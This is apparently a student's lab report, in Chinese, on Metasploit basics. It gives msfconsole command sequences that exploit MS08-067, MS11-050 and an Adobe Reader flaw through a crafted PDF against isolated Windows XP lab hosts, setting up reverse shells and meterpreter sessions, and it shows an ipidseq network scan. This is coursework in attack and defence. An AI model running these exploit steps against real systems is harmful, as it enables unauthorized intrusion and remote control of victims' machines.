20155318 《网络攻防》Exp5 MSF基础应用

20155318 《网络攻防》Exp5 MSF基础应用

基础问题

  • 用自己的话解释什么是exploit,payload,encode?
  • exploit就相当于是载具,将真正要负责攻击的代码传送到靶机中
  • payload也就相当于载荷,相当于我们之前实验的后门,exploit把它传送到靶机中后,它就负责执行相应的攻击代码。
  • encode也就是编码,主要是为了避免payload中坏字符影响功能,其次是为了伪装,不让杀毒软件很轻易的就发现payload是攻击代码。

实验步骤

Windows服务渗透攻击——MS08-067安全漏洞
  • 攻击机:kali,ip:192.168.153.129
  • 靶机:windows XP SP3(English),IP地址是192.168.153.130
  • 在kali输入msfconsole进入控制台后依次输入以下指令:
use exploit/windows/smb/ms08_067_netapi
set payload generic/shell_reverse_tcp//tcp反向回连
set LHOST 192.168.153.129//此IP是kali的IP
set LPORT 5318//端口
set RHOST 192.168.153.130//此IP是靶机WIN XP的IP,特定漏洞端口已经固定
set target 0
exploit//进行攻击
  • 1072864-20180428204305015-2106500801.png

  • 建立会话,攻击结果如下:
  • 1072864-20180428204311036-1886486694.png

针对浏览器的攻击:MS11-050
  • 攻击机:kali,IP地址是192.168.153.129
  • 靶机:Windows XP Professional SP3 简体中文,IP地址是192.168.153.131
    在攻击机kali输入msfconsole进入控制台,依次输入以下指令:
msf > use windows/browser/ms11_050_mshtml_cobjectele
msf exploit(ms11_050_cobjectelement) > set payload windows/meterpreter/reverse_http //http反向回连
msf exploit(ms11_050_cobjectelement) > set LHOST 192.168.153.129 //攻击机ip
msf exploit(ms11_050_cobjectelement) > set LPORT 5318 //攻击端口固定
msf exploit(ms11_050_cobjectelement) > set URIPATH 5318lxy //统一资源标识符路径设置
msf exploit(ms11_050_cobjectelement) > exploit

1072864-20180428204333836-1383354545.png

  • 在靶机访问http://192.168.153.129:8080/5318lxy
  • 1072864-20180428204350964-377092736.png

  • 会提示windows为了保护计算机已经关闭此程序
  • 1072864-20180428204357631-859198750.png

  • 将internet选项中和安全有关的都降级、关闭,允许运行和安装软件
  • 1072864-20180428204403814-1566902907.png

  • 再次访问,还是失败
  • 1072864-20180428204410864-905269388.png

针对客户端的攻击:adobe_toolbutton
  • 攻击机:kali,ip:192.168.153.129
  • 靶机:Windows XP Professional SP3 简体中文,IP地址是192.168.153.131
  • 在msf下用search
  • 1072864-20180428204420116-1136027262.png

  • 依次输入以下指令:
msf > use windows/fileformat/adobe_cooltype_sing
msf exploit(adobe_cooltype_sing) > set payload windows/meterpreter/reverse_tcp //tcp反向回连
msf exploit(adobe_cooltype_sing) > set LHOST 192.168.153.129 //攻击机ip
msf exploit(adobe_cooltype_sing) > set LPORT 5318 //攻击端口
msf exploit(adobe_cooltype_sing) > set FILENAME exp5_5318.pdf //设置生成pdf文件的名字
msf exploit(adobe_cooltype_sing) > exploit //攻击
  • 成功生成exp5_5318.pdf:
  • 1072864-20180428204429018-754273095.png

  • 1072864-20180428204437368-734721742.png

  • 将pdf文件传送或拷贝到靶机上后,在kali上输入back退出当前模块,进入监听模块,输入以下命令:
msf > use exploit/multi/handler //进入监听模块
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp //tcp反向连接
msf exploit(handler) > set LHOST 192.168.153.131 //攻击机ip
msf exploit(handler) > set LPORT 5318 //攻击端口固定
msf exploit(handler) > exploit
  • 然后在靶机上打开20155312.pdf文件
  • 1072864-20180428204455550-1500578862.png

  • 运行后,回连成功
  • 1072864-20180428204504202-815740552.png

  • 运行ipconfig命令
  • 1072864-20180428204519961-1779591145.png

  • 靶机关闭pdf文件,主机失去权限
  • 1072864-20180428204531368-1369697112.png

应用任何一个辅助模块:ipidseq
ipidseq
  • 功能:扫描网段中的存活ip,它会识别被发现主机的IPID(用于跟踪IP包的次序的一种技术)序列模式,并且表示出哪些是0、随机或递增的。

  • 拥有递增的IPID的空闲(空闲是指该主机在特定时间内不向网络发送数据包)主机(即显示为Incremental!的条目),不会被网络上的其它主机严重影响,可以用来进行TCP空闲扫描。

  • TCP空闲扫描:是一种高级的nmap扫描方式,这种扫描方式能让我们冒充网络上另一台主机的IP地址对目标进行更为隐秘的扫描。

  • 具体流程
  • 攻击机:kali,IP地址是192.168.153.132
  • 靶机:Windows XP Professional SP3 简体中文,IP地址是192.168.153.131
  • use auxiliary/scanner/ip/ipidseq
  • 查看需要设置的参数,设置完成后确认一下,然后就可以开始exploit了。
  • 1072864-20180428204539916-799855453.png

  • 设为对单一目标主机的扫描
  • 1072864-20180428204545627-1685224771.png

  • 1072864-20180428204552023-1916099585.png

  • 对指定网段的主机进行扫描:
  • 1072864-20180428204602691-1700861311.png

实验总结

  • 本次实验我学会了MSF工具的一些常用指令,了解六个模块用法,整体实验流程并不复杂,但是使用浏览器的那个攻击我没有成功,尝试了其他多种方法也不行,打算等假期结束后再继续尝试。
  • 离实战还缺些什么技术或步骤?
  • 目前都只是针对XP系统进行攻击,还不能直接对现在的操作系统进行攻击,但是攻击原理应该是相同的。

转载于:https://www.cnblogs.com/lxy1997/p/8969539.html

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值